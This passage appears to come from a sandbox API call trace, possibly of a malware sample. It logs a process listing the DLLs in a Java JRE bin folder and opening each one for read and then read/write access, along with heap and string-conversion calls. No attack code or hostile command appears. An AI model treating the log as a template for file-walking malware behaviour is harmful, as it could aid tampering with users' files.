Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.165] GetFileType (hFile=0x360) returned 0x1 [0094.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0094.165] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.165] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.165] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.166] CloseHandle (hObject=0x360) returned 1 [0094.166] AreFileApisANSI () returned 1 [0094.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0094.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 56 [0094.166] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.166] GetFileType (hFile=0x360) returned 0x1 [0094.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0094.166] CloseHandle (hObject=0x360) returned 1 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.167] AreFileApisANSI () returned 1 [0094.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0094.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0094.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 56 [0094.167] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5e40)) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.168] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1ae40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="WindowsAccessBridge-64.dll", cAlternateFileName="WINDOW~1.DLL")) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0094.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0094.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.168] AreFileApisANSI () returned 1 [0094.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 66 [0094.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0094.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0094.169] AreFileApisANSI () returned 1 [0094.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0094.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0094.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 66 [0094.169] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.169] GetFileType (hFile=0x360) returned 0x1 [0094.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0094.169] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.170] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.170] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.170] CloseHandle (hObject=0x360) returned 1 [0094.170] AreFileApisANSI () returned 1 [0094.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0094.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82958 [0094.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 66 [0094.170] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.170] GetFileType (hFile=0x360) returned 0x1 [0094.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0094.170] CloseHandle (hObject=0x360) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0094.171] AreFileApisANSI () returned 1 [0094.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x81fc8 [0094.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 66 [0094.172] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1ae40)) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0094.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.172] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="wsdetect.dll", cAlternateFileName="")) returned 1 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0094.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0094.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0094.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0094.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.173] AreFileApisANSI () returned 1 [0094.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, 